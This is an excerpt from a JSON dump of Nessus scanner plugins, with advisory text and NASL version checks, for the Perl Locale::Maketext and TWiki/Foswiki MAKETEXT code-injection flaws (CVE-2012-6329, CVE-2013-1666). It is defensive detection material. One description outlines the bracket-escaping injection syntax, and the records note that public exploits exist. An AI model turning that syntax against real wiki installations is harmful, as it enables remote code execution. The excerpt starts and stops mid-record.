"2014-10-13T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:perl", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:Locale-Maketext"], "id": "GENTOO_GLSA-201410-02.NASL", "href": 
"https://www.tenable.com/plugins/nessus/78384", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201410-02.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78384);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_xref(name:\"GLSA\", value:\"201410-02\");\n\n script_name(english:\"GLSA-201410-02 : Perl, Perl Locale-Maketext module: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201410-02\n(Perl, Perl Locale-Maketext module: Multiple vulnerabilities)\n\n Two vulnerabilities have been reported in the Locale-Maketext module for\n Perl, which can be exploited by malicious users to compromise an\n application using the module.\n The vulnerabilities are caused due to the “_compile()” function not\n properly sanitising input, which can be exploited to inject and execute\n arbitrary Perl code.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security.gentoo.org/glsa/201410-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All users of the Locale-Maketext module should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=perl-core/Locale-Maketext-1.230.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:Locale-Maketext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/perl\", unaffected:make_list(\"ge 5.17.7\"), vulnerable:make_list(\"lt 5.17.7\"))) flag++;\nif (qpkg_check(package:\"perl-core/Locale-Maketext\", unaffected:make_list(\"ge 1.230.0\"), vulnerable:make_list(\"lt 1.230.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Perl / Perl Locale-Maketext module\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:48", "description": "Fix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "published": "2013-01-25T00:00:00", "title": "Fedora 16 : perl-5.14.3-205.fc16 (2013-0633)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:perl", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-0633.NASL", "href": "https://www.tenable.com/plugins/nessus/64085", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0633.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64085);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56950);\n script_xref(name:\"FEDORA\", value:\"2013-0633\");\n\n script_name(english:\"Fedora 16 : perl-5.14.3-205.fc16 (2013-0633)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=884354\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097440.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2de94c2c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"perl-5.14.3-205.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:48", "description": "Fix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329). App::Cpan(3pm) manual page was\nincluded in two subpackages by mistake. This release keeps the file in\nperl-CPAN package only.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "published": "2013-01-31T00:00:00", "title": "Fedora 18 : perl-5.16.2-237.fc18 (2013-0659)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2013-01-31T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:perl"], "id": "FEDORA_2013-0659.NASL", "href": "https://www.tenable.com/plugins/nessus/64368", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0659.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64368);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56950);\n script_xref(name:\"FEDORA\", value:\"2013-0659\");\n\n script_name(english:\"Fedora 18 : perl-5.16.2-237.fc18 (2013-0659)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329). App::Cpan(3pm) manual page was\nincluded in two subpackages by mistake. This release keeps the file in\nperl-CPAN package only.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=884354\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097811.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8c770f9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-5.16.2-237.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:18:49", "description": "According to its version number, the instance of TWiki running on\nthe remote host is affected by multiple security vulnerabilities :\n\n - The '%MAKETEXT{}%' variable fails to properly sanitize\n user-supplied input. 
A remote attacker can exploit this\n issue to execute arbitrary shell commands on the remote\n host subject to the privileges of the web server user.\n (CVE-2012-6329)\n\n - The '%MAKETEXT{}%' variable fails to properly sanitize\n user-supplied input, which can lead to a denial of\n service condition if an overly large value is passed to\n the variable. (CVE-2012-6330)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "published": "2013-01-07T00:00:00", "title": "TWiki < 5.1.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "modified": "2013-01-07T00:00:00", "cpe": ["cpe:/a:twiki:twiki"], "id": "TWIKI_5_1_3.NASL", "href": "https://www.tenable.com/plugins/nessus/63399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63399);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6329\", \"CVE-2012-6330\");\n script_bugtraq_id(56950);\n\n script_name(english:\"TWiki < 5.1.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of TWiki.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a CGI application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of TWiki running on\nthe remote host is affected by multiple security vulnerabilities :\n\n - The '%MAKETEXT{}%' variable fails to properly sanitize\n user-supplied input. 
A remote attacker can exploit this\n issue to execute arbitrary shell commands on the remote\n host subject to the privileges of the web server user.\n (CVE-2012-6329)\n\n - The '%MAKETEXT{}%' variable fails to properly sanitize\n user-supplied input, which can lead to a denial of\n service) condition if an overly large value is passed to\n the variable. (CVE-2012-6330)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to TWiki version 5.1.3 or later. Alternatively, apply the\nhotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/07\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:twiki:twiki\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"twiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/TWiki\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"TWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\ninstall_url = build_url(port:port, qs:dir);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions 4.0.x - 5.1.2 are affected\nif (\n # 4.X\n (ver[0] == 4) ||\n # 5.x < 5.1.3\n (ver[0] == 5 && ver[1] < 1) ||\n (ver[0] == 5 && ver[1] == 1 && ver[2] < 3)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 5.1.3' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T10:45:14", "description": "According to its version number, the instance of Foswiki installed on\nthe remote host is affected by a code injection vulnerability in the\n'%MAKETEXT{}%' macro. An incomplete fix to CVE-2012-6329 left this\nattack vector available in which an attacker can invoke arbitrary Perl\nmodules by escaping brackets within 'MAKETEXT =~~[Some::Module,~~]='. 
\n\nNote that Foswiki installations in which localization is not enabled or\n'Locale::Maketext' has been upgraded to version 1.23, are not affected. \n\nNote also that Nessus has not tested for this issue, but instead, has\nrelied only on the application's self-reported version number.", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-03-06T00:00:00", "title": "Foswiki < 1.1.8 MAKETEXT Macro Arbitrary Code Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1666", "CVE-2012-6329"], "modified": "2013-03-06T00:00:00", "cpe": ["cpe:/a:foswiki:foswiki"], "id": "FOSWIKI_1_1_8.NASL", "href": "https://www.tenable.com/plugins/nessus/65059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65059);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1666\");\n script_bugtraq_id(58026);\n\n script_name(english:\"Foswiki < 1.1.8 MAKETEXT Macro Arbitrary Code Injection\");\n script_summary(english:\"Checks version of Foswiki.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a CGI application that is affected by a\ncode injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of Foswiki installed on\nthe remote host is affected by a code injection vulnerability in the\n'%MAKETEXT{}%' macro. An incomplete fix to CVE-2012-6329 left this\nattack vector available in which an attacker can invoke arbitrary Perl\nmodules by escaping brackets within 'MAKETEXT =~~[Some::Module,~~]='. \n\nNote that Foswiki installations in which localization is not enabled or\n'Locale::Maketext' has been upgraded to version 1.23, are not affected. 
\n\nNote also that Nessus has not tested for this issue, but instead, has\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://foswiki.org/Support/SecurityAlert-CVE-2013-1666\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to version 1.1.8 or later or apply the hotfix in the\nreferenced URL. Additionally, Locale::Maketext should be upgraded to\nversion 1.23.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1666\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foswiki:foswiki\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"foswiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"www/foswiki\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname : \"foswiki\",\n port : port,\n exit_on_fail : TRUE\n);\ndir = install[\"dir\"];\nversion = install[\"ver\"];\ninstall_url = build_url(port:port, qs:dir+\"/view\");\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Foswiki\", install_url);\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions 1.0.0 - 1.1.7 are affected\nif (\n (ver[0] == 1 && ver[1] < 1) ||\n (ver[0] == 1 && ver[1] == 1 && ver[2] < 8)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.1.8' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Foswiki\", install_url, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:07", "description": "Updated perl packages fix security vulnerability :\n\nIt was discovered that Perl's 'x' string repeat operator is vulnerable\nto a heap-based buffer overflow. 
An attacker could use this to execute\narbitrary code (CVE-2012-5195).\n\nThe _compile function in Maketext.pm in the Locale::Maketext\nimplementation in Perl before 5.17.7 does not properly handle\nbackslashes and fully qualified method names during compilation of\nbracket notation, which allows context-dependent attackers to execute\narbitrary commands via crafted input to an application that accepts\ntranslation strings from users (CVE-2012-6329).\n\nIn order to prevent an algorithmic complexity attack against its\nhashing mechanism, perl will sometimes recalculate keys and\nredistribute the contents of a hash. This mechanism has made perl\nrobust against attacks that have been demonstrated against other\nsystems. Research by Yves Orton has recently uncovered a flaw in the\nrehashing code which can result in pathological behavior. This flaw\ncould be exploited to carry out a denial of service attack against\ncode that uses arbitrary user input as hash keys. Because using\nuser-provided strings as hash keys is a very common operation, we urge\nusers of perl to update their perl executable as soon as possible.\nUpdates to address this issue have been pushed to maint-5.8,\nmaint-5.10, maint-5.12, maint-5.14, and maint-5.16 branches today.\nVendors* were informed of this problem two weeks ago and are expected\nto be shipping updates today (or otherwise very soon) (CVE-2013-1667).", "edition": 28, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : perl (MDVSA-2013:113)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-6329"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:perl-base", "p-cpe:/a:mandriva:linux:perl-doc", "p-cpe:/a:mandriva:linux:perl-devel", "p-cpe:/a:mandriva:linux:perl", "p-cpe:/a:mandriva:linux:perl-Locale-Maketext"], "id": "MANDRIVA_MDVSA-2013-113.NASL", "href": "https://www.tenable.com/plugins/nessus/66125", 
"sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:113. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66125);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56287, 56950, 58311);\n script_xref(name:\"MDVSA\", value:\"2013:113\");\n script_xref(name:\"MGASA\", value:\"2012-0352\");\n script_xref(name:\"MGASA\", value:\"2013-0032\");\n script_xref(name:\"MGASA\", value:\"2013-0094\");\n\n script_name(english:\"Mandriva Linux Security Advisory : perl (MDVSA-2013:113)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one 